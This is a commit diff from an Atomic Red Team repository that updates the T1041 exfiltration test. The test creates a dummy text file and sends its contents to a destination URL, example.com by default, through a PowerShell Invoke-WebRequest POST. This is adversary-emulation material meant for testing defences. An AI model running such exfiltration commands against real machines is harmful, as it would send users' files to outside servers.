security-tools/atomic-red-team
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci]

Browse Source
This commit is contained in:
CircleCI Atomic Red Team doc generator
2022-01-12 20:27:25 +00:00
parent 7669b73daf
commit c8c20df839
2 changed files with 9 additions and 32 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomics/Indexes/index.yaml
+5 -18
View File
@@ -71612,25 +71612,12 @@ exfiltration:
filepath:
description: The file which is being exfiltrated to the C2 Server.
type: Path
default: C:\Users\$env:UserName\LineNumbers.txt
dependency_executor_name: powershell
dependencies:
- description: 'The file to be exfiltrated must be present on the machine. Running
the pre-reqs will create a sample file to be exfiltrated, else give the
path of already present file as input.
'
prereq_command: 'if ([System.IO.File]::Exists("#{filepath}")){exit 0} else
{exit 1}
'
get_prereq_command: "echo \"Creating file to be exfiltrated\" \n1..100 | ForEach-Object
{ Add-Content -Path #{filepath} -Value \"This is line $_.\" }\n"
default: "$env:TEMP\\LineNumbers.txt"
executor:
command: |
[System.Net.ServicePointManager]::Expect100Continue = $false
$filecontent = Get-Content -Path #{filepath}
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
command: "if(-not (Test-Path #{filepath})){ \n 1..100 | ForEach-Object {
Add-Content -Path #{filepath} -Value \"This is line $_.\" }\n}\n[System.Net.ServicePointManager]::Expect100Continue
= $false\n$filecontent = Get-Content -Path #{filepath}\nInvoke-WebRequest
-Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive\n"
name: powershell
T1011:
technique:
atomics/T1041/T1041.md
+4 -14
View File
@@ -25,13 +25,16 @@ Exfiltrates a file present on the victim machine to the C2 server.
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| destination_url | Destination URL to post encoded data. | String | example.com|
| filepath | The file which is being exfiltrated to the C2 Server. | Path | C:\Users\$env:UserName\LineNumbers.txt|
| filepath | The file which is being exfiltrated to the C2 Server. | Path | $env:TEMP\LineNumbers.txt|
#### Attack Commands: Run with `powershell`!
```powershell
if(-not (Test-Path #{filepath})){
1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
}
[System.Net.ServicePointManager]::Expect100Continue = $false
$filecontent = Get-Content -Path #{filepath}
Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -DisableKeepAlive
@@ -40,19 +43,6 @@ Invoke-WebRequest -Uri #{destination_url} -Method POST -Body $filecontent -Disab
#### Dependencies: Run with `powershell`!
##### Description: The file to be exfiltrated must be present on the machine. Running the pre-reqs will create a sample file to be exfiltrated, else give the path of already present file as input.
##### Check Prereq Commands:
```powershell
if ([System.IO.File]::Exists("#{filepath}")){exit 0} else {exit 1}
```
##### Get Prereq Commands:
```powershell
echo "Creating file to be exfiltrated"
1..100 | ForEach-Object { Add-Content -Path #{filepath} -Value "This is line $_." }
```
<br/>